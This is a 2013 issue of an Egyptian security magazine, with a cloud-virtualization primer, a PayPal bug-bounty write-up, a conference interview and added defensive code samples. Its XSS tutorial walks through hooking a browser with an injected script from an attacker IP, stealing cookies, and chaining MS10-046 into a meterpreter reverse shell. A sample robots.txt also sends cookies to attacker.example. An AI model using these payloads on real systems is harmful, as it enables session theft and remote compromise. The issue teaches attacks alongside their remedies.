Security Kaizen Magazine, Issue 10

Vol. 3, Issue 10, July/Sept. 2013, www.bluekaizen.org

Cover: Internet Security Report from Symantec; Interview with Aseem Jakhar & Moataz Salah; Hunting for Vulnerabilities in PayPal; Updates to Facebook Bounty Program


The Security Kaizen Magazine provides information on industry advancements and professional development to those involved in the cyber security domain, who in turn educate their partners about issues and trends in the industry. Issue 10 includes an interview with Aseem Jakhar and Moataz Salah, cloud computing security, an XSS attack through Metasploit, security news, Assessing and Exploiting Control Systems, and more.


Advertisement: The First Online Recruitment Portal for Information Security Jobs in the Middle East

Masthead

For advertisement in Security Kaizen Magazine and the www.bluekaizen.org website, mail [email protected] or phone +2 0100 267 5570.

Security Kaizen is issued every 3 months. Reproduction in whole or part without written permission is strictly prohibited. All copyrights are preserved to www.bluekaizen.org.

Chairman & Editor-in-Chief: Moataz Salah
Editors: Bahaa Ahmed, Yahia Mamdouh, Amgad Magdy, Joe Sullivan, Justin Searle, Ibrahim Mosaad, Ahmed Fawzy
Website Development: Mariam Samy
Marketing Coordinators: Mahitab Ahmed, Mohamed Saeed
Proofreading: Jeff Compton
Designed & Printed: 2day Adv., 01013126152

Contents

Editor's Note: No one can deny that the situation in Egypt is very hard; the unstable political situation affects businesses of all kinds.

Interview: Today we try a unique idea in the interview section. Under the topic "Security Conferences in Developed Countries", the Bluekaizen team interviews two conference founders.

Step by Step (Cloud Computing, Part 3): We have talked before about cloud computing: what it is, its service models, deployment types and the market-leading providers.

New & News: Apple's all-new iOS 7 launched at WWDC 2013 this week, and within 48 hours of its release iPhone user Jose Rodriguez was able to bypass the lock screen and access the Photos in just a few seconds.

Grey Hat (XSS Attack Through Metasploit): Many users do not consider XSS a big deal, yet it can lead to injecting client-side script into web pages viewed by other users.

User to User (Hunting for Vulnerabilities in PayPal): Ibrahim M. El-Sayed, a security researcher at vulnerability-lab, explains the team's journey of finding vulnerabilities in PayPal.

Best Practice: CAPTCHA is short for "Completely Automated Public Turing test to tell Computers and Humans Apart".

Book Review: This book will be a valuable resource to those involved in penetration testing activities, as well as security professionals and network and system administrators.

Editor's Note

No one can deny that the situation in Egypt is very hard; the unstable political situation affects businesses of all kinds. But over the last couple of years we have been releasing the magazine in times worse than this. Sometimes, I think if we were working in a more stable business environment, we would be having more success: printing the magazine monthly instead of quarterly; reaching more readers and getting more ads. But I always find in every failure lies opportunity, and in every bad news story a new challenge awaits us. That’s what gives our lives meaning.


Today, I feel that Bluekaizen holds a huge responsibility in leading change in the information security field in Egypt and the Middle East. We have been working so hard in the last 3 years to build the community, gather experts, partner with companies and communicate with government. I believe we have had great success thus far and it will be a big waste if this community doesn’t start to affect the industry.

That's why I want to use this opportunity to announce a new Bluekaizen service that will help solidify the community further, and might be a small step towards creating an ecosystem for the information security field.

Security Jobs Portal

In the last couple of years I have got to know many companies that were searching for good candidates in the information security field. Many times I have also been asked to nominate an instructor for a certain course or service, either in Egypt or abroad. At the same time I was close to candidates who wanted to change jobs, and to fresh graduates who wanted to get hired by a good company. These connections inspired me to add a new service to the Bluekaizen profile.

Today, we are working on a recruitment portal where companies can post their jobs to the security community and the security community can post their security skills. The portal’s role is to do the match making between the two and help find the preferred candidates for the specific jobs.

I have been monitoring the activities of all recruitment websites for a while now, and I have noticed that the main issue is filtering. To solve this issue, Job Seekers won’t submit CVs; they will submit their skills. They will submit what they are good at. For example one is a good CEH instructor, another is a good IPS implementer. Someone is experienced in McAfee Encryption products and another is experienced in Symantec backup products.

So, I am asking all our beloved members to start adding their skills and for all companies to start posting their jobs on www.onlysecurityjobs.com

We purchased a new domain to make this project separate from Bluekaizen.org and to make the whole website focus only on the recruitment process. We have a big vision for this portal that won’t succeed without your contributions, either companies or job seekers.

Step by Step: Cloud Computing, Part 3

We have talked before about cloud computing: what it is, its service models, its deployment types and the market-leading cloud providers. Then we looked at the security aspects of cloud computing from a different perspective, covering the major areas of concern about the technology and the security challenges you will face when you start your journey to the cloud. We will now approach these aspects from a more technical point of view and dive deeply into each layer of cloud computing and its security, to help organizations learn more about it and to increase awareness of cloud computing security in Egypt.

The core of cloud computing, as we noted before, is virtualization technology. But what does virtualization really mean? What are its levels and types? In order to define its risks and security threats, we need to understand how it works. Virtualization technologies enable the execution of multiple operating system instances, or virtual machines (VMs), on the same physical server. The layer within the virtualization platform that enables hardware resource sharing among VMs is called the hypervisor.

What is a hypervisor? Software that is responsible for allocating hardware resources to VMs. It also keeps the resources of the virtual machines separate and isolated from each other. Examples include VMware ESX Server (vSphere) and Citrix XenServer.

What are the virtualization levels?

• Server virtualization: divides a physical computer/server into several partly or completely isolated machines, commonly known as virtual machines (VMs) or guest machines, which minimizes cost by increasing hardware utilization. For example, instead of 20 servers each running at 15% of capacity, you can reduce your hardware count, and the associated costs, to 4 servers each running at 80%.

• Desktop virtualization: enables you to deliver secure virtual desktops as a managed service for remote and branch-office employees, known as Desktop as a Service.

• Storage virtualization: pools your existing server disks into a single storage unit or shared pool without the cost and complexity of purchasing a SAN. It involves techniques such as data striping and data mirroring.

• Network virtualization: the creation of a workspace within a larger network, or across networks, using virtualization techniques.

Types of virtualization:

• Full virtualization: the guest OS runs unmodified and believes it owns the hardware. Where the CPU cannot trap a privileged instruction, the hypervisor uses binary translation: it rewrites the guest's kernel code, replacing non-virtualizable instructions with new sequences of instructions that have the intended effect on the virtual hardware.

• Para-virtualization: the software interface presented to the virtual machines is not identical to the underlying hardware, and the guest OS is modified to cooperate with the hypervisor. (For example, a virtual network adapter may have capabilities that the physical NIC doesn't have.)

Hypervisor types:

• Type 1 hypervisor (bare-metal): runs directly on the system hardware and does not require a full host OS, which offers higher virtualization efficiency and a smaller attack surface. Examples include VMware ESX and Citrix XenServer.

• Type 2 hypervisor (hosted): runs on top of a host operating system that provides virtualization services to the hosted VMs. This type adds security concerns to the virtualization architecture, because we have now introduced the vulnerabilities

Virtualization security concerns:

• Hypervisor compromise: if the hypervisor layer is compromised (hacked, its configuration changed, malicious code injected, etc.) the whole security framework breaks. The cloud provider should therefore restrict direct access to the servers hosting the hypervisor, secure remote connections to the hypervisor, patch the hypervisor and restrict access to the hypervisor APIs.

• Virtual communications: ensure that applications running in one VM cannot access applications running in another VM, other virtual machines in the same environment, or the underlying host machine.

• VM escape: a program running in a virtual machine is able to bypass the virtual layer (the hypervisor) and gain access to the host machine. Escapes typically exploit bugs in emulated devices or in the hypervisor's guest-facing interfaces, so the risk is mitigated by keeping the hypervisor patched, exposing to each guest only the virtual devices and host/guest interaction features (shared folders, clipboard, guest agents) it actually needs, and configuring that host/guest interaction properly.

• Host monitoring of VM traffic: all network traffic to/from the VMs passes through the host, which lets the host monitor all the network traffic of its VMs. Conversely, if the host is compromised, the security of the VMs is also in question.

• Denial of Service (DoS): a guest can mount a denial-of-service attack against other guests on the same system, because they all share the same hardware, CPU and network resources. To prevent such attacks, configure the virtualization solution to limit the resources (CPU shares, memory, disk I/O and bandwidth) allocated to each guest machine.

• Traditional network security: in the virtual world, traditional network security devices/controls will not be effective, because most of the communication happens inside the virtual environment; we therefore have to bring those controls into the virtualization layer as well. A virtual-layer network security appliance gives the security administrator the ability to put the VMs into security zones based on their trust level and how critical they are.

• VM file integrity: in the virtualized world a VM is just a set of files (how many, and of which types, depends on the virtualization technology and hypervisor in use). Anyone who can modify these VM files can compromise the VM. The provider should apply hashing techniques to verify that the VM files are unchanged.

• Trojaned virtual machines: one of the biggest benefits of virtualization is that it reduces the time and effort of preparing and building an environment by using OS templates (pre-packaged OS images). But what if the template is trojaned or infected? That will infect every VM created from it. The provider should use verified and tested templates, or build the templates with its own experts.

• Hypervisor-based rootkit: runs in "ring -1" and hosts the target operating system as a virtual machine, enabling the rootkit to intercept hardware calls made by the original operating system. Examples of such rootkits are Blue Pill, SubVirt and Vitriol. Microsoft Research and North Carolina State University demonstrated HookSafe, a hypervisor-based system that protects kernel hooks and thereby provides generic protection against kernel-mode rootkits.
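The "VM file integrity" and "trojaned virtual machines" concerns above come down to the same control: record a cryptographic fingerprint of the approved VM files and check it before the VM is started or cloned. The following Python example is added here to illustrate that control; it is not code from the article or from any hypervisor vendor. It assumes a VM is a directory of files (a .vmx config and a .vmdk disk are used as stand-ins), hashes each file with SHA-256, and puts an HMAC over the manifest so the manifest itself cannot be quietly edited. The sample files, the key and the paths are constructed for the demo.

```python
"""Integrity manifest for VM image files (added example, not from the article).

Assumptions (hypothetical, not from the page): the VM's files live in one
directory, the manifest is produced when the image is approved, and the HMAC
key is held where no tenant or attacker can reach it (an HSM/KMS in practice).
"""
import hashlib
import hmac
import json
import os
import tempfile

CHUNK = 1 << 20  # hash in 1 MiB chunks so a large disk image need not fit in RAM


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(vm_dir: str) -> dict:
    """Map every regular file under vm_dir (relative path) to its SHA-256."""
    manifest = {}
    for root, _dirs, files in os.walk(vm_dir):
        for name in files:
            full = os.path.join(root, name)
            manifest[os.path.relpath(full, vm_dir)] = sha256_file(full)
    return manifest


def sign_manifest(manifest: dict, key: bytes) -> str:
    """HMAC-SHA256 over canonical JSON: editing a listed hash invalidates the tag."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def verify_vm(vm_dir: str, manifest: dict, tag: str, key: bytes) -> list:
    """Return findings; an empty list means the VM files match the approved manifest."""
    if not hmac.compare_digest(sign_manifest(manifest, key), tag):
        return ["manifest signature invalid"]  # do not trust the listed hashes at all
    current = build_manifest(vm_dir)
    findings = []
    for rel, expected in manifest.items():
        actual = current.get(rel)
        if actual is None:
            findings.append(f"missing: {rel}")
        elif actual != expected:
            findings.append(f"modified: {rel}")
    for rel in current:
        if rel not in manifest:
            findings.append(f"unexpected: {rel}")  # e.g. an added disk or config file
    return findings


def demo() -> tuple:
    """Constructed scenario: approve a VM, tamper with it, then forge the manifest."""
    key = b"constructed-demo-key"  # hypothetical; never stored within the VM's reach
    with tempfile.TemporaryDirectory() as vm_dir:
        with open(os.path.join(vm_dir, "web01.vmx"), "w") as f:
            f.write('displayName = "web01"\n')
        with open(os.path.join(vm_dir, "web01.vmdk"), "wb") as f:
            f.write(os.urandom(4096))  # stand-in for a disk image
        manifest = build_manifest(vm_dir)
        tag = sign_manifest(manifest, key)
        clean = verify_vm(vm_dir, manifest, tag, key)
        # tamper: change the config and drop in an extra file
        with open(os.path.join(vm_dir, "web01.vmx"), "a") as f:
            f.write('serial0.present = "TRUE"\n')
        with open(os.path.join(vm_dir, "extra.vmdk"), "wb") as f:
            f.write(b"\x00" * 16)
        tampered = verify_vm(vm_dir, manifest, tag, key)
        # an attacker who rewrites the expected hash still fails the signature check
        forged = dict(manifest, **{"web01.vmx": sha256_file(os.path.join(vm_dir, "web01.vmx"))})
        forged_result = verify_vm(vm_dir, forged, tag, key)
    return clean, sorted(tampered), forged_result


if __name__ == "__main__":
    print(demo())
```

The same manifest check belongs in the template pipeline: hash a template when your experts sign it off, and refuse to clone from it once a hash no longer matches.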

Grey Hat: XSS Attack Through Metasploit

Nowadays XSS (cross-site scripting) is a growing problem for web applications. Many users do not consider XSS a big deal, yet it lets an attacker inject client-side script into web pages viewed by other users. The attacker can also use XSS to bypass access controls such as the same-origin policy and take over the session. In this article we demonstrate how to carry out an XSS attack using the Metasploit Framework that ships with the Kali Linux distribution.

The Cross-Site Scripting Framework (XSSF) is a security tool designed to make exploiting XSS much easier. XSSF works by creating a communication channel with every browser that loads the injected script and listing each hooked target (victim) with an ID. When a user visits a page that is vulnerable to XSS, the attacker fingerprints the user's browser, looks for a suitable exploit, runs it and compromises the system. XSSF's integration into Metasploit also lets the attacker launch an MSF browser-based exploit from the XSS vulnerability.

Install XSSF

First update the Metasploit Framework. When the update completes, export the XSSF project into the MSF directory from the terminal. Use svn export inside the MSF directory, because an svn checkout would break MSF's own .svn metadata.

Now start Metasploit by typing msfconsole in the terminal. Once Metasploit is loaded, activate XSSF by typing

load xssf port=666

(without the option XSSF listens on its default port, 8888). After loading, type help xssf to display all options, and xssf_urls to display the generic script to inject.

Setting up the target

On our other system we installed WampServer 2.0 on Windows 7, as it is vulnerable to cross-site scripting. After the installation completes, we test it by clicking the language options, which shows the following URL:

http://localhost/?lang=en

We changed it to http://localhost/?lang="> which produces the following error, confirming that reflected cross-site scripting exists.

Hooking the browser

Now we inject the browser with the generic script:

http://localhost/?lang="><script src="http://192.168.40.162:8888/loop?interval=2"></script>

After the script runs, check that the injection was successful by typing xssf_victims in Metasploit. The figure shows the victim IP, browser name and server ID. We will proceed to exploit two browsers, Mozilla Firefox and Internet Explorer.

To find out more about a remote machine, type xssf_information 2, where 2 is the server ID. With many victims there will be multiple server IDs: 1, 2, 3, etc.

Stealing cookies

After getting information from the victim we dig deeper with the cookie stealer module. By default the module is launched against ALL active remote machines (active = true); this can be changed to the targeted victim only, or run at an interval. Type

msf > use auxiliary/xssf/public/misc/cookie
msf > run

After a while, interrupt the auxiliary and type xssf_logs 1. All cookies that have been collected will show up; they are also visible through the XSSF GUI.

Another auxiliary option sends an alert to a remote machine:

msf > use auxiliary/xssf/public/misc/alert

Configure the message to send with show options, then run.

Compromising the machine

Now we compromise the target machine with ms10_046 (the exploit/windows/browser/ms10_046_shortcut_icon_dllloader module). MS10-046 is a flaw in how the Windows Shell handles shortcut (.LNK) files. The module serves a shortcut pointing to a malicious DLL over a WebDAV share; when the share is opened as a UNC path, the shell parses the .LNK, loads the DLL and runs the arbitrary payload without user interaction.

Start by using exploit ms10_046, set the payload to windows/meterpreter/reverse_tcp so the victim connects back to us, and set LHOST to the attacker machine's IP. Running the exploit creates a background job.

Type msf > jobs; it shows the background job with ID 0. Then type

msf > xssf_exploit 0 1

where 1 is the victim's session ID in XSSF and 0 is the ID of the exploit's background job. This starts the exploit and sends the LNK file, which leads to the malicious DLL.

With a successful exploitation you now own the system and have a meterpreter session.


Remedy

To protect against XSS vulnerabilities, implement several things:

1. Do not trust user input, especially cookies. The application should validate input before acting on it, and limit the domain and path for which cookies are accepted.
2. Don't store confidential data in cookies.
3. Users can install browser add-ons that watch input fields and use XSS filters.

Conclusion

XSS attacks can compromise many websites and systems and lead to information leakage. We showed how an attacker can use an XSS vulnerability and also how to protect users from cross-site scripting. Websites should use vulnerability scanners to detect XSS. Remember, it is very important to validate input and encode output.
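The walkthrough above confirms the vulnerability by reflecting a "><script src=...> payload through the ?lang= parameter, and the remedy calls for not trusting that input. The following Python example is added here and is not code from the article, from WampServer or from XSSF. It models a page that echoes lang into a link the way the vulnerable target does, a small probe that reports whether an XSSF-style hook would load, and a hardened version of the same page that allow-lists the parameter, HTML-encodes it on output anyway, and marks the session cookie HttpOnly so a script that does run cannot read it. The attacker host is the one from the walkthrough; the page markup, the allowed language set and the cookie value are constructed for the demo.

```python
"""Reflected XSS via ?lang=: vulnerable page, a probe, and the hardened page.

Added example, not code from the article or its tools. The page generators
stand in for the "language options" page the article tests; their markup and
the ALLOWED_LANGS set are constructed for this demo.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

HOOK_URL = "http://192.168.40.162:8888/loop?interval=2"  # attacker host from the walkthrough
PAYLOAD = f'"><script src="{HOOK_URL}"></script>'
ALLOWED_LANGS = {"en", "fr", "ar"}  # allow-list: the only values the application supports


def lang_from_url(url: str) -> str:
    """Pull the raw ?lang= value out of a URL (empty string if absent)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("lang", [""])[0]


def render_vulnerable(url: str) -> str:
    """Echoes the parameter straight into an attribute: the bug the article exploits."""
    lang = lang_from_url(url)
    return f'<html><body><a href="/?lang={lang}">Language: {lang}</a></body></html>'


def render_hardened(url: str) -> str:
    """Validate against the allow-list, then HTML-encode on output (defence in depth)."""
    lang = lang_from_url(url)
    if lang not in ALLOWED_LANGS:
        lang = "en"  # reject, do not "clean": unknown values fall back to a default
    safe = html.escape(lang, quote=True)
    return f'<html><body><a href="/?lang={safe}">Language: {safe}</a></body></html>'


def session_cookie_header() -> str:
    """Set-Cookie value the hardened page would send (constructed session id).

    HttpOnly keeps document.cookie away from the cookie-stealer module even if
    some other script injection succeeds; SameSite limits cross-site sending.
    """
    return "PHPSESSID=abc123; HttpOnly; SameSite=Lax; Path=/"


SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc=[\"']([^\"']+)[\"']", re.IGNORECASE)


def reflects_hook(page: str, hook_url: str = HOOK_URL) -> bool:
    """True if the page contains an unescaped <script src=hook_url>: the injection worked."""
    return any(src == hook_url for src in SCRIPT_SRC.findall(page))


def probe(render) -> bool:
    """Send the payload through a page renderer and report whether the hook would load."""
    return reflects_hook(render(f"http://localhost/?lang={PAYLOAD}"))


if __name__ == "__main__":
    print("vulnerable page reflects hook:", probe(render_vulnerable))
    print("hardened page reflects hook:", probe(render_hardened))
    print("Set-Cookie:", session_cookie_header())
```

The probe is the same check the walkthrough does by hand with xssf_victims, just without a browser: if the hook URL survives into the HTML unescaped, the XSSF loop script would load. Note that the hardened page rejects unknown values rather than trying to strip tags from them; stripping is what attackers bypass.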

Yahia Mamdouh
Certified CCNA, CEH; founder and instructor of the Master Metasploit course

User to User: Hunting for Vulnerabilities in PayPal with VLABS

I am Ibrahim M. El-Sayed, a security researcher at vulnerability-lab. Today I am going to explain our journey of finding vulnerabilities in PayPal. The agenda for this article: why PayPal acknowledged us in the wall of fame, our methodology for finding vulnerabilities, an example of one of our vulnerabilities, our reporting technique, and finally some tips.

We, vulnerability-lab, were acknowledged by PayPal for finding more than 70 vulnerabilities in PayPal services. We found different types, such as blind and non-blind SQL injections, server- and client-side cross-site scripting vulnerabilities, mail encoding web vulnerabilities, authentication bypass vulnerabilities, and more. We were among the top ten security researchers on the wall of fame.

Having explained our contribution to PayPal, in this section I will explain our methodology for hunting vulnerabilities. We usually work in teams and divide the work up by the different services. For example, I work on a service that is hosted on a subdomain such as test.paypal.com. We always do our testing manually. We use Firefox as our browser for hacking, with some add-ons and tools that help us gather information about the server and ease manual testing: Tamper Data, Burp Suite, Live HTTP Headers, Cookies Manager+, HackBar and Firebug. We try to understand the logic behind the service and mark every place where the service accepts input from the user, directly or indirectly. By directly, I mean data like a company name or address. Indirectly, for example, when you upload an image, the metadata inside the image might get processed, and that could be vulnerable. After logging all possible spots, we estimate what vulnerabilities might be there, e.g. a persistent XSS or a SQL injection. After collecting the data and forming hypotheses, we start injecting malicious code until we discover a vulnerability. Sometimes we face difficulties when exploiting a vulnerability; at that stage we get together as a team and think about how to exploit it or bypass the restriction.

In this section I will explain one of our vulnerabilities at PayPal. It has already been patched. Its title on our website is "Paypal Bug Bounty #48 - Persistent Web Vulnerability". It is a persistent XSS vulnerability located in a service called GP+, which objectively analyzes and assesses the quality and findability of online stores. We analyzed the scanning process of GP+. It was vulnerable in many places, but the one I liked most was the following. In one stage of the analysis, the PayPal service reads the robots.txt of the target website, saves its content and, when the user checks the analysis results, displays that robots.txt content. The idea occurred to me: what would happen if the robots.txt file contained malicious code? How would the PayPal service behave when it saved and displayed the content? Was there any filtering on the input or the output? As it turned out, PayPal applied no security checks to the input coming from the robots.txt file and displayed it as is. In the following picture you can see the code from the malicious robots.txt file executing perfectly.
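The GP+ bug above is stored XSS through a second-order input: content fetched from a third party's robots.txt and shown back later. Escaping on output would have stopped it, but robots.txt has a tiny grammar, so a stricter fix is to parse the stored file into the directives it can legitimately contain and render only those. The Python example below is added to illustrate that approach; it is not PayPal's code and not part of the vulnerability-lab report. The malicious robots.txt sample is constructed for the demo, and the accepted field set and the table rendering are assumptions.

```python
"""Displaying a fetched robots.txt without executing whatever it contains.

Added example modelling the GP+ step the article describes (fetch a site's
robots.txt, store it, show it back later). No real site is contacted; the
sample below is constructed in the spirit of the article's attack.
"""
import html
import re

ROBOTS_MALICIOUS = """User-agent: *
Disallow: /admin/
Sitemap: https://shop.example/sitemap.xml
<script>document.location='http://attacker.example/?c='+document.cookie</script>
User-agent: Googlebot
Allow: /<img src=x onerror=alert(1)>
"""

# Only what the robots exclusion format defines (plus the common Sitemap/Crawl-delay extensions).
KNOWN_FIELDS = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay"}
LINE_RE = re.compile(r"^\s*([A-Za-z-]+)\s*:\s*(.*?)\s*$")
VALUE_RE = re.compile(r"^[A-Za-z0-9*._~:/?#@!$&'()+,;=%-]*$")  # URL/path characters only


def render_raw(stored: str) -> str:
    """The pattern the article found: stored content dropped into the results page as-is."""
    return f"<pre>{stored}</pre>"


def parse_robots(stored: str) -> tuple:
    """Split a stored robots.txt into (directives, rejected_lines).

    A line is kept only if it is 'field: value' with a known field and a value
    made of URL characters; everything else is counted, never rendered.
    """
    directives, rejected = [], []
    for raw in stored.splitlines():
        line = raw.split("#", 1)[0]  # comments are dropped, not shown
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m or m.group(1).lower() not in KNOWN_FIELDS or not VALUE_RE.match(m.group(2)):
            rejected.append(raw)
            continue
        directives.append((m.group(1).lower(), m.group(2)))
    return directives, rejected


def render_parsed(stored: str) -> str:
    """Render the parsed directives; output-encode anyway so a stray quote in a path is inert."""
    directives, rejected = parse_robots(stored)
    rows = "".join(
        f"<tr><td>{html.escape(field)}</td><td>{html.escape(value)}</td></tr>"
        for field, value in directives
    )
    note = f"<p>{len(rejected)} line(s) not in robots.txt syntax were skipped.</p>" if rejected else ""
    return f"<table>{rows}</table>{note}"


def contains_markup(page: str) -> bool:
    """Demo check: does an unescaped script or img tag survive into the page?"""
    return bool(re.search(r"<(script|img)\b", page, re.IGNORECASE))


if __name__ == "__main__":
    print("raw page carries attacker markup:", contains_markup(render_raw(ROBOTS_MALICIOUS)))
    print(render_parsed(ROBOTS_MALICIOUS))
```

The point is that a scanner which stores fetched content is an input boundary like any other: the site being analyzed is the untrusted party, so its robots.txt deserves the same parse-then-render treatment as a form field.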

We have a standard reporting technique. Our report includes all the details of the vulnerability: the URL, a proof of concept, a proposed fix, the risk, and more. We also attach screenshots of the vulnerability, and finally the vulnerable pages after being exploited. To clarify, if the vulnerable page is search.php, we download the page with the payload inside and attach it to the report. We send the report to the PayPal security team at [email protected], which you can use to report any vulnerability you find. PayPal sets you up with an account on https://keys.ebay.com and you communicate with them through that account.

Finally, I would like to mention some tips that will help you in hunting for vulnerabilities. The first piece of advice is to work from a good methodology that you have set up in your mind. Understand the logic of the service before you test it; this makes the problem easier, and it keeps you from working like a tool that blindly tests every input. You will often find that the logic itself is vulnerable. I also recommend working in teams, where you encourage each other and share knowledge. I don't need to mention that you should NEVER lose hope: keep trying until you discover something, and always believe in your potential. Last but not least, if you have any questions regarding the article, the vulnerability or anything else you think I can help with, you are more than welcome to contact me at [email protected]

Ibrahim Mosaad, Security Researcher at Vulnerability Lab

Interview: Security Conferences in Developed Countries

Today we try a unique idea in the interview section. Under the topic "Security Conferences in Developed Countries", the Bluekaizen team interviewed the founders of two security conferences in two different countries: Aseem Jakhar, founder of the Nullcon conference in India (www.nullcon.net), and Moataz Salah, founder of Cairo Security Camp in Egypt (www.CairoSecurityCamp.com). We will try to see the differences and the similarities between the two conferences and the two founders' visions.


Can you give us more details about your conference (goals, history, how many versions till now, activities..etc )

Aseem: The motto of the conference is "The next security thing!", which simply means we focus on the future and not on the present. This was the original goal of starting the conference. We wanted a place where everyone could share information on the next generation of offensive and defensive security. We have successfully conducted four conferences in Goa and one in Delhi (2012). The conference has grown enormously in both content/events and footfall. We have too many sub-events to keep the delegates busy for four days. We have 3 different hacking challenges: HackIM, Battle Underground and Jailbreak. In addition to the talks and trainings, we have free workshops, hacking villages and other fun events. We are also known for our recreational activities. We take the delegates out to the Saturday night bazaar in North Goa and have a couple more networking parties for the delegates. We also introduced the concept of night talks this year, on the night before the first day of the conference. It was an immediate hit, with a larger crowd than expected attending the talks after dinner.

Moataz: I believe all conferences share the same goal, which is to transfer knowledge, announce the latest technologies and all that beautiful stuff. But I would like to add here that Cairo Security Camp, or as we call it CSCAMP, has another long-term goal. Our goal is to build a generation that has the right skills to protect this part of the world. We in Bluekaizen believe that it is our role and duty to raise the level of knowledge and awareness of security professionals.

Can you please tell us why you chose that name for your conference?

Moataz: The reason we chose Cairo Security Camp as a name for our conference is that our vision was to have a full week of information security knowledge for geeks. Mostly the idea of any camp is that you go to a place far from your home to gain knowledge, have fun and change your normal routine. It is the same in our Security Camp: the idea is to let professionals leave their offices and gather in one place for a whole week once a year (2 days for the conference and the rest for training) to share knowledge, transfer information and, most importantly, have fun.

Aseem: We had a lot of discussion on this while deciding the name. People even suggested names along the lines of h4ckf357 (hackfest). Choosing the name nullcon was not very difficult, though. Every team member related to the name instantly in their own way: for some, nullcon meant a tribute to null, the open security community; for some the prefix had relevance to security; for some, mathematics. What was more difficult was choosing the venue. While almost everyone thinks of organizing conferences in metro cities, more specifically the IT hubs, we thought about it and took a different approach by starting the conference in Goa. The aim was simple, i.e. to relax and also do what you love to do at the same time. The community over time began to appreciate our decision.

Moataz (continuing on the conference's history): Cairo Security Camp's first version was CSCAMP2010. We will have the fourth version this year in November. CSCAMP is improving exponentially every year. We started in CSCAMP2010 with one room for one day. In CSCAMP2011 we had one conference hall accompanied by a capture-the-flag competition, where hackers gather at CSCAMP to challenge their skills against other teams, and we extended it that year to 2 days. In CSCAMP2012 we had two conference rooms instead of one, the CTF and an exhibition area for companies. In CSCAMP2013 we are planning to add more activities.

What is the most unique thing about your conference?

Aseem: Every conference says that it is unique :) and that is actually true in one sense, as every conference has its own flavour which cannot be replicated elsewhere. We don't consider ourselves a conference but rather an experience one can only fathom by physically participating instead of reading about it somewhere. As far as content goes, we focus on futuristic technology and the attacks of tomorrow, not on what is plaguing systems as of now. We aim to become the platform where researchers and innovative security firms unleash their next-generation security research. We also add a local touch to nullcon Goa by having a track for local hacks (called Desi Jugaad in Hindi), where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real-life challenges or taking up new initiatives.

Apart from this, nullcon is the first conference in the world where the Govt. came forward with a bounty program on botnet identification and access. They provided a live malware sample to the participants of the bounty and announced a reward for the first person with information and access. This also caused a little controversy in the botnet research community. Anyway, within a day one of the participants actually won the bounty.

Moataz: With the number of security conferences around the world, I believe our unique point is that CSCAMP is the first and only periodic information security conference that has Arabic as its main language. Most people understand English in my country, but having the sessions in Arabic gave us a competitive advantage and enabled us to discover many security professionals and researchers.


Can you give us a quick comparison between the first version of your conference and the last one?

Moataz: In CSCAMP2010 we had an average of 80 attendees and 5 speakers in one day. In CSCAMP2012 we had an average of 350 attendees, more than 24 speakers over 2 days, a capture-the-flag competition with more than 30 players, and an exhibition area. Also in CSCAMP2012 we had the support of the government, represented by the NTRA, and also BlackBerry, Orange and others. We also ran a pre-conference training for the first time in CSCAMP2012. These are quick numbers to show how CSCAMP events are continuously improving year after year. I remember that the first year we started preparation a month before the event. Today we start preparation the day after last year's conference. We open registration 3 months ahead, which is not normal for Egyptian conferences. The level of my tension before CSCAMP2012 cannot be compared with CSCAMP2010, and at the same time the level of happiness after the end of CSCAMP2012 cannot be compared with CSCAMP2010.

Aseem: When we look back now, the first conference was very small compared to the last one. However, at the same time it was the most difficult in terms of taking the decision to organize it in the first place. It was really difficult for us to decide to come out of our comfort zone and organize an event. We are all security researchers and none of us had any prior experience in organizing an event. The first event was a single-track two-day conference. It has grown enormously since then and transformed into a four-day event, including two days of highly technical training followed by two days of conference with a quad track for talks, workshops and villages, and a separate exhibition area. Also, not to forget the three different hacking challenges, three different recreational events, and unlimited live hacking and discussions.

What is the average price/ ticket?Aseem: There are various packages. The conference price ranges from USD 60 (students) to USD 250 and the training costs range from USD 250 to 700, depending on the duration of the training and the time when you purchase the passes as we have different discounts prior to the conference.

Moataz: The standard ticket costs nearly 100 USD including lunch and coffee breaks for the 2 days, but we do provide cheaper tickets for students and we even sometimes provide free tickets for people who contribute to the community. For example, this year, all Bluekaizen Gold members will enter CSCAMP2013 for free.

What is the average number of attendees at your conference?

Aseem: We get roughly around 350-450 delegates at Goa and we expect the number to increase in the coming years, as we are just four years old :). We get good participation from various Govt. agencies. The majority of the delegates visit nullcon out of their sheer passion for information security, which is something we really appreciate in our audience.

Moataz: We received an average of 350-400 attendees in the last two versions, attending the capture the flag competition, the two parallel conference halls and the exhibition area.

What is the main language of your conference? And do you think it's better to use the local language or English?

Aseem: The main language is English. The language is not a concern in India compared to other parts of the world, as almost everyone speaks or understands English. In contrast, there are just too many local languages here, which makes English the best choice :).

Moataz: I have had many debates regarding this question. Although we have a few sessions in English, as we invite famous keynotes every year, our main language is Arabic. This is our competitive advantage over any other conference in the region. My vision is to go international by going deep local.

What are the main problems you face regarding your conference?

Moataz: We have two main problems; the first is the lack of companies working in the security field in Egypt and the Middle East in general. This kind of conference needs sponsors and exhibitors to cover its expenses. The second problem is the lack of awareness of the information security field.

Aseem: The main problems are marketing and sponsorship, and this is something that all conferences face. As we are young, it is a little difficult to convince first-time sponsors that participating in the conference will help them in effectively communicating the technical aspects of their offerings to the right audience, who actually understand what they need.

Do you provide any other kind of activities during the year?

Aseem: Payatu Technologies is a boutique security testing company. Apart from organizing the conference, we at Payatu Technologies specialize in product security testing, telecom security assessments, mobile and application security assessments and security training.

Moataz: Sure, we do provide specialized security training. We build our own curriculum. Till now, we have 5 courses in our catalogue: Security Fundamentals, Pen Test for Beginners, Web Application Security, Linux Security and Windows Security. Our second activity is Security Kaizen magazine. This is our quarterly magazine, distributed for free to our readers. The main goal of the magazine is to raise the awareness of our readers and keep them always connected to the latest news of information security.

What's up with the upcoming conference?

